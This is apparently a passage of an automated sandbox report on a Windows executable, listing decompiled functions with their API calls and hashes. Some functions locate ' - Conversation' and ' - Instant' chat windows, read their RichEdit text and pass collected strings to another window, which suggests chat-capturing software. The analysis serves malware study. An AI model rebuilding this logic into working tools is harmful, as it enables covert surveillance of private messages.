    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43f8e3, _t30);
    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();
    				_t28 = 1;
    				_push(" - Conversation");
    				 *(_t30 - 4) = _t28;
    				L0043DFD6();
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    Instruction addresses, one per line of the C-code above (0x00000000 where the decompiler attached no instruction to that line):
    0x00409a5b
    0x00409a61
    0x00409a66
    0x00409a6c
    0x00409a6d
    0x00409a79
    0x00409a7a
    0x00409a7f
    0x00409a82
    0x00409a87
    0x00409a8b
    0x00409a8e
    0x00409a93
    0x00409a96
    0x00409a9d
    0x00409aa9
    0x00409ab1

    APIs
    • __EH_prolog.LIBCMT ref: 00409A5B
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42( - Conversation), ref: 00409A82
    • #4129.MFC42(?,00000000, - Conversation), ref: 00409A8E
    • #800.MFC42(?,00000000, - Conversation), ref: 00409A9D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID: - Conversation
    • API String ID: 2193304076-2140947825
    • Opcode ID: 9dad134e229cba4b68e483c7130fd4783a4c4238312140a6e0ad64e58becef09
    • Instruction ID: 31d8e53c20fe96153ca677803914aefb27190e56434720f7a48a11b6f2845888
    • Opcode Fuzzy Hash: 9dad134e229cba4b68e483c7130fd4783a4c4238312140a6e0ad64e58becef09
    • Instruction Fuzzy Hash: 70F03072800118BBDB15EF51D842BDE7B64EF18368F10D41FF4165A181DBBCA708CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			// Walks the target window tree: looks below an "AfxOleControl42" child for a
    			// "#32770" (dialog) window and, if one exists, reads the text of the "RichEdit20A"
    			// control through E0040FEA7; otherwise the result is built from the constant
    			// string at 0x4550cc via MFC #537 (the CString(const char*) constructor).
    			// _t8 is an undeclared decompiler temporary.
    			E004093BA(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				void* __ebp;
    
    				_v8 = _v8 & 0x00000000;
    				if(FindWindowExA(E0040FE29(_a8, "AfxOleControl42", 1), 0, "#32770", 0) != 0) {
    					_push(E0040FE29(_t8, "RichEdit20A", 0));
    					_push(_a4);
    					E0040FEA7();
    				} else {
    					_push(0x4550cc);
    					L0043DE26();
    				}
    				return _a4;
    			}

    APIs
      • Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43
    • FindWindowExA.USER32 ref: 004093DE
    • #537.MFC42(004550CC), ref: 004093F0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindWindow$#537
    • String ID: #32770$AfxOleControl42$RichEdit20A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004094EF(void* __ecx) {
    				void* _t18;
    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43f7c7, _t30);
    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();
    				_t28 = 1;
    				_push(" - Instant");
    				 *(_t30 - 4) = _t28;
    				L0043DFD6();
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004094F4
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42( - Instant), ref: 0040951B
    • #4129.MFC42(?,00000000, - Instant), ref: 00409527
    • #800.MFC42(?,00000000, - Instant), ref: 00409536
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID: - Instant
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0040AC97(void* __ecx) {
    				void* _t18;
    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43fbaf, _t30);
    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();
    				_t28 = 1;
    				_push(" - Conversation");
    				 *(_t30 - 4) = _t28;
    				L0043DFD6();
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040AC9C
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42( - Conversation), ref: 0040ACC3
    • #4129.MFC42(?,00000000, - Conversation), ref: 0040ACCF
    • #800.MFC42(?,00000000, - Conversation), ref: 0040ACDE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID: - Conversation
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00409E3A(void* __ecx) {
    				void* _t18;
    				signed int _t28;
    				void* _t30;
    
    				E0043E4E0(0x43f987, _t30);
    				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t30 + 0xc)));
    				_push(_t30 + 0xc);
    				_t18 = E0040FEA7();
    				_t28 = 1;
    				_push(" - Instant");
    				 *(_t30 - 4) = _t28;
    				L0043DFD6();
    				_push(_t18);
    				_push( *((intOrPtr*)(_t30 + 8)));
    				L0043DFD0();
    				 *(_t30 - 0x10) = _t28;
    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
    				return  *((intOrPtr*)(_t30 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00409E3F
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42( - Instant), ref: 00409E66
    • #4129.MFC42(?,00000000, - Instant), ref: 00409E72
    • #800.MFC42(?,00000000, - Instant), ref: 00409E81
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
    • String ID: - Instant
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00409DB9(intOrPtr __ecx, void* __eflags) {
    				intOrPtr _t19;
    				void* _t21;
    
    				E0043E4E0(0x43f95b, _t21);
    				_push(__ecx);
    				_t19 = __ecx;
    				 *((intOrPtr*)(_t21 - 0x10)) = __ecx;
    				E0040FB90(__ecx);
    				L0043DDD8();
    				 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
    				 *((intOrPtr*)(__ecx)) = 0x4461f8;
    				if(E00428A6B() == 0) {
    					_push("RichEdit20A");
    				} else {
    					_push("RichEdit20W");
    				}
    				L0043DDD2();
    				 *[fs:0x0] =  *((intOrPtr*)(_t21 - 0xc));
    				return _t19;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00409DBE
    • #540.MFC42(?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DD5
      • Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85
    • #860.MFC42(RichEdit20A,?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DFB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #540#860H_prologVersion
    • String ID: RichEdit20A$RichEdit20W
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0041FAB9(void* __ecx, signed int _a4, signed int _a8) {
    				void* __ebp;
    				signed int _t42;
    				signed int _t43;
    				signed int _t44;
    				void* _t46;
    				signed int _t50;
    				signed int _t53;
    				signed int _t55;
    				void* _t60;
    				void* _t61;
    				signed int _t62;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				signed int _t69;
    				signed int _t76;
    				void* _t77;
    
    				_t42 = _a8;
    				_t77 = __ecx;
    				if(_t42 != 0xffffffff) {
    					 *((intOrPtr*)(__ecx + 0x10)) = _t42;
    				}
    				_t76 = _a4;
    				if(_t76 != 0) {
    					_t65 =  *(_t77 + 4);
    					__eflags = _t65;
    					if(_t65 != 0) {
    						_t62 =  *(_t77 + 0xc);
    						__eflags = _t76 - _t62;
    						if(_t76 > _t62) {
    							_t43 =  *(_t77 + 0x10);
    							__eflags = _t43;
    							if(_t43 == 0) {
    								asm("cdq");
    								_t69 = 8;
    								_t43 =  *(_t77 + 8) / _t69;
    								__eflags = _t43 - 4;
    								if(_t43 >= 4) {
    									__eflags = _t43 - 0x400;
    									if(_t43 > 0x400) {
    										_t43 = 0x400;
    									}
    								} else {
    									_t43 = 4;
    								}
    							}
    							_t44 = _t43 + _t62;
    							__eflags = _t76 - _t44;
    							_a8 = _t44;
    							if(_t76 >= _t44) {
    								_a8 = _t76;
    							}
    							_t46 = _a8 << 3;
    							_push(_t46);
    							L0043DD54();
    							_t63 = _t46;
    							memcpy(_t63,  *(_t77 + 4),  *(_t77 + 8) << 3);
    							_t50 =  *(_t77 + 8);
    							_t67 = _t76 - _t50;
    							__eflags = _t67;
    							_push(_t67);
    							_push(_t63 + _t50 * 8);
    							E0041FC5A();
    							_push( *(_t77 + 4));
    							L0043DD42();
    							_t53 = _a8;
    							 *(_t77 + 4) = _t63;
    							 *(_t77 + 8) = _t76;
    							 *(_t77 + 0xc) = _t53;
    							return _t53;
    						}
    						_t55 =  *(_t77 + 8);
    						__eflags = _t55 - _t76;
    						if(__eflags >= 0) {
    							if(__eflags > 0) {
    								_t55 = E0041FC06(_t65 + _t76 * 8, _t55 - _t76);
    							}
    						} else {
    							_push(_t76 - _t55);
    							_push(_t65 + _t55 * 8);
    							_t55 = E0041FC5A();
    						}
    						L8:
    						 *(_t77 + 8) = _t76;
    						return _t55;
    					}
    					_t60 = _t76 << 3;
    					__eflags = _t60;
    					_push(_t60);
    					L0043DD54();
    					 *(_t77 + 4) = _t60;
    					_push(_t76);
    					_push(_t60);
    					_t55 = E0041FC5A();
    					 *(_t77 + 0xc) = _t76;
    					goto L8;
    				} else {
    					_t61 =  *(_t77 + 4);
    					if(_t61 != 0) {
    						_t61 = E0041FC06(_t61,  *(_t77 + 8));
    						_push( *(_t77 + 4));
    						L0043DD42();
    						 *(_t77 + 4) =  *(_t77 + 4) & _t76;
    					}
    					 *(_t77 + 0xc) =  *(_t77 + 0xc) & 0x00000000;
    					 *(_t77 + 8) =  *(_t77 + 8) & 0x00000000;
    					return _t61;
    				}
    			}

    APIs
    • #825.MFC42(?,?,?), ref: 0041FAE6
    • #823.MFC42(?), ref: 0041FB8A
    • memcpy.MSVCRT ref: 0041FB9C
    • #823.MFC42(?), ref: 0041FB09
      • Part of subcall function 0041FC5A: __EH_prolog.LIBCMT ref: 0041FC5F
      • Part of subcall function 0041FC5A: memset.MSVCRT ref: 0041FC75
      • Part of subcall function 0041FC5A: #540.MFC42(0041FBB5,?,?), ref: 0041FC92
    • #825.MFC42(?,?,?), ref: 0041FBB8
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #823#825$#540H_prologmemcpymemset
    • String ID:
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0042AD83(void* __ecx, signed int _a4, signed int _a8) {
    				signed int _t34;
    				signed int _t35;
    				signed int _t36;
    				void* _t38;
    				signed int _t46;
    				signed int _t48;
    				signed int _t52;
    				intOrPtr _t53;
    				intOrPtr _t54;
    				void* _t55;
    				signed int _t61;
    				signed int _t68;
    				void* _t69;
    
    				_t34 = _a8;
    				_t69 = __ecx;
    				if(_t34 != 0xffffffff) {
    					 *((intOrPtr*)(__ecx + 0x10)) = _t34;
    				}
    				_t68 = _a4;
    				if(_t68 != 0) {
    					_t11 = _t69 + 4; // 0x42ad67
    					_t57 =  *_t11;
    					if( *_t11 != 0) {
    						_t15 = _t69 + 0xc; // 0x410b70
    						_t54 =  *_t15;
    						if(_t68 > _t54) {
    							_t17 = _t69 + 0x10; // 0x403f4d
    							_t35 =  *_t17;
    							if(_t35 == 0) {
    								_t18 = _t69 + 8; // 0x42ad28
    								asm("cdq");
    								_t61 = 8;
    								_t35 =  *_t18 / _t61;
    								if(_t35 >= 4) {
    									if(_t35 > 0x400) {
    										_t35 = 0x400;
    									}
    								} else {
    									_t35 = 4;
    								}
    							}
    							_t36 = _t35 + _t54;
    							_a8 = _t36;
    							if(_t68 >= _t36) {
    								_a8 = _t68;
    							}
    							_t38 = _a8 * 0x1004;
    							_push(_t38);
    							L0043DD54();
    							_t55 = _t38;
    							_t26 = _t69 + 8; // 0x42ad28
    							_t27 = _t69 + 4; // 0x42ad67
    							memcpy(_t55,  *_t27,  *_t26 * 0x1004);
    							_t28 = _t69 + 8; // 0x42ad28
    							E0042AF12(_t55 +  *_t28 * 0x1004, _t68 -  *_t28);
    							_t29 = _t69 + 4; // 0x42ad67
    							_push( *_t29);
    							L0043DD42();
    							_t46 = _a8;
    							 *(_t69 + 4) = _t55;
    							 *(_t69 + 8) = _t68;
    							 *(_t69 + 0xc) = _t46;
    							return _t46;
    						}
    						_t16 = _t69 + 8; // 0x42ad28
    						_t48 =  *_t16;
    						if(_t68 > _t48) {
    							_t48 = E0042AF12(_t48 * 0x1004 + _t57, _t68 - _t48);
    						}
    						L8:
    						 *(_t69 + 8) = _t68;
    						return _t48;
    					}
    					_t52 = _t68 * 0x1004;
    					_push(_t52);
    					L0043DD54();
    					 *(_t69 + 4) = _t52;
    					_t48 = E0042AF12(_t52, _t68);
    					 *(_t69 + 0xc) = _t68;
    					goto L8;
    				}
    				_t4 = _t69 + 4; // 0x42ad67
    				_t53 =  *_t4;
    				if(_t53 != 0) {
    					_push(_t53);
    					L0043DD42();
    					 *(_t69 + 4) =  *(_t69 + 4) & _t68;
    				}
    				 *(_t69 + 0xc) =  *(_t69 + 0xc) & 0x00000000;
    				 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
    				return _t53;
    			}

    APIs
    • #825.MFC42(0042AD67,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042ADA5
    • #823.MFC42(000000FF,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042AE44
    • memcpy.MSVCRT ref: 0042AE59
    • #823.MFC42(74B06940,0042AD28,00449630,00000000,?,0042ACC1,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000), ref: 0042ADCB
      • Part of subcall function 0042AF12: memset.MSVCRT ref: 0042AF23
    • #825.MFC42(0042AD67,0042AD28,74B06940,0042AD29,000000FF,74B06940,00000000,0042A184,?,?,?,00000001,00000000,0042A4E3), ref: 0042AE7A
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823#825$memcpymemset
    • String ID:
    • API String ID: 3809198941-0
    • Opcode ID: f5d7f8940416119dd906d344f29c921912bd4975446fb78e45879e69d48c5bb8
    • Instruction ID: ca9e758b798a788e7ebd8d42da0894d482a92dffecf0b8ba358e2135409f85e2
    • Opcode Fuzzy Hash: f5d7f8940416119dd906d344f29c921912bd4975446fb78e45879e69d48c5bb8
    • Instruction Fuzzy Hash: DB3126727007105FD7209E2AE981A57B7E9EB84325F51C82FF55ACB651DA3CE8018F19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00426C36(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v284;
    				char _v412;
    				char _v540;
    				char _v796;
    				signed int _v800;
    				signed int _v804;
    				signed int _v808;
    				signed int _v812;
    				signed int _v816;
    				signed int _v820;
    				signed int _v824;
    				signed int _v828;
    				void* _t65;
    				void* _t66;
    				void* _t71;
    
    				_t71 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x2734)) == _a8) {
    					_v16 = _v16 & 0x00000000;
    					_v8 =  &_v828;
    					_v828 =  *(__ecx + 0x1a19) & 0x000000ff;
    					_v820 =  *(__ecx + 0x1a1a) & 0x000000ff;
    					_v12 = 0x32c;
    					_v808 =  *(__ecx + 0x1a1d) & 0x000000ff;
    					_v812 =  *(__ecx + 0x1a1c) & 0x000000ff;
    					_v816 =  *(__ecx + 0x1a1b) & 0x000000ff;
    					_v804 =  *(__ecx + 0x1a1e) & 0x000000ff;
    					_v800 =  *(__ecx + 0x1a20) & 0x000000ff;
    					_v824 =  *(__ecx + 0x17f8) & 0x000000ff;
    					_v28 =  *((intOrPtr*)(__ecx + 0x1d2c));
    					_v24 =  *((intOrPtr*)(__ecx + 0x2724));
    					lstrcpyA( &_v796, __ecx + 0x1a21);
    					lstrcpyA( &_v412, _t71 + 0x1ba1);
    					lstrcpyA( &_v284, _t71 + 0x1c21);
    					lstrcpyA( &_v540, _t71 + 0x1b21);
    					SendMessageA(_a4, 0x4a,  *(_t71 + 0x20),  &_v16);
    					_t65 = 1;
    					return _t65;
    				}
    				_t66 = 1;
    				return _t66;
    			}

    APIs
    • lstrcpyA.KERNEL32(?,?), ref: 00426CF8
    • lstrcpyA.KERNEL32(?,?), ref: 00426D08
    • lstrcpyA.KERNEL32(?,?), ref: 00426D18
    • lstrcpyA.KERNEL32(?,?), ref: 00426D28
    • SendMessageA.USER32(0000032C,0000004A,?,00000000), ref: 00426D36
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: lstrcpy$MessageSend
    • String ID:
    • API String ID: 749160242-0
    • Opcode ID: b6d26ba5f8d4390e3c33aa067d3c64cc3aee6b68844ba7bad5ae96af161ab111
    • Instruction ID: b37baa5249104efcf5716d1c0aac6bd7d8e342f899d5b1ba3a7299bb495c4d18
    • Opcode Fuzzy Hash: b6d26ba5f8d4390e3c33aa067d3c64cc3aee6b68844ba7bad5ae96af161ab111
    • Instruction Fuzzy Hash: BD3124B6905758AFC761CF74D850ADABBFCAF4D300F00459BE59AE2140D634A744CF60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004250CC(void* __ecx, void* __esi) {
    				struct tagRECT _v20;
    				void* _t17;
    				long _t31;
    				intOrPtr _t32;
    				void* _t41;
    				struct HWND__* _t45;
    
    				_t41 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x74)) != 0 ||  *((intOrPtr*)(__ecx + 0x17df)) == 0) {
    					return _t17;
    				} else {
    					_v20.top = 0;
    					_v20.left = 0;
    					_v20.right = GetSystemMetrics(0);
    					_v20.bottom = GetSystemMetrics(1);
    					if( *((intOrPtr*)(_t41 + 0x1e0c)) == 1) {
    						_t45 = GetForegroundWindow();
    						if(_t45 != 0 && IsWindowVisible(_t45) != 0) {
    							GetWindowRect(_t45,  &_v20);
    						}
    					}
    					_t31 = _v20.left;
    					if(_v20.right - _t31 < 0x96) {
    						_v20.right = _t31 + 0x96;
    					}
    					_t32 = _v20.top;
    					if(_v20.bottom - _t32 < 0x96) {
    						_v20.bottom = _t32 + 0x96;
    					}
    					E00428FAA( &_v20);
    					return E00425177(_t41,  &_v20);
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$MetricsSystem$ForegroundRectVisible
    • String ID:
    • API String ID: 2547220785-0
    • Opcode ID: 9026f5075ed5be8e8a33aaf39338df44444bb1c6ee299f9af76925040e821230
    • Instruction ID: 20f177fdc121625a7624ab437cd72417c5ec394d5778d5826695189ebe9d50f2
    • Opcode Fuzzy Hash: 9026f5075ed5be8e8a33aaf39338df44444bb1c6ee299f9af76925040e821230
    • Instruction Fuzzy Hash: 5C118B72F01529AFCB05EFB9E9846BFBBB9AB84304F54417FD411A3300EB349A518B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FE29(struct HWND__* _a4, CHAR* _a8, char _a12) {
    				struct tagRECT _v20;
    				struct HWND__* _v24;
    				CHAR* _v28;
    				char _v32;
    				intOrPtr _v36;
    				void* _v40;
    				CHAR* _t18;
    				struct HWND__* _t29;
    				struct HWND__* _t31;
    				struct HWND__* _t32;
    
    				_t29 = _a4;
    				_t31 = FindWindowExA(_t29, 0, _a8, 0);
    				_a4 = _t31;
    				_t32 = _t31;
    				while(_t32 != 0) {
    					_t18 = IsWindowVisible(_t31);
    					if(_t18 != 0) {
    						GetWindowRect(_t31,  &_v20);
    						_v40 = _t31;
    						_v28 = _a8;
    						_v32 = _a12;
    						_v36 = _v20.top;
    						_v24 = _t29;
    						EnumChildWindows(_t29, E0040FDB8,  &_v40);
    						return _v40;
    					}
    					_t31 = FindWindowExA(_t29, _t31, _a8, _t18);
    				}
    				return 0;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$Find$ChildEnumRectVisibleWindows
    • String ID:
    • API String ID: 3579691185-0
    • Opcode ID: ef0edb0084ceb0e7c3543bf440e48db764feec57a817c8ee32eed9ceb0e0aa9a
    • Instruction ID: e75c25b05c4f2b1e60ed192ae6dde79af439fc8429278a9425749aebadd2fa37
    • Opcode Fuzzy Hash: ef0edb0084ceb0e7c3543bf440e48db764feec57a817c8ee32eed9ceb0e0aa9a
    • Instruction Fuzzy Hash: 82113CB6901218ABCB11DFA9CC40AEFBBBCEF4D250F104436F905F3251D234AA018BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0043EAB1(short* _a4) {
    				char* _t4;
    				signed int _t8;
    				int _t18;
    				char* _t22;
    				short* _t24;
    
    				_t24 = _a4;
    				if(_t24 != 0) {
    					_t4 = wcslen(_t24);
    					_t3 =  &(_t4[2]); // 0x2
    					_t18 =  &(_t4[_t3]);
    					_push(_t18);
    					L0043DD54();
    					_t22 = _t4;
    					if(_t22 == 0) {
    						E0043E9F0(0x8007000e);
    					}
    					 *_t22 = 0;
    					if(WideCharToMultiByte(0, 0, _t24, 0xffffffff, _t22, _t18, 0, 0) == 0) {
    						if(GetLastError() == 0) {
    							_t8 = 0;
    						} else {
    							_t8 = GetLastError() & 0x0000ffff | 0x80070000;
    						}
    						E0043E9F0(_t8);
    					}
    					return _t22;
    				}
    				return 0;
    			}

    APIs
    • wcslen.MSVCRT ref: 0043EAC4
    • #823.MFC42(00000002,?,?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EACE
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,?,00000000,00409D20,?,?,00409C18), ref: 0043EAF0
    • GetLastError.KERNEL32(?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EB00
    • GetLastError.KERNEL32(?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EB06
    Memory Dump Source
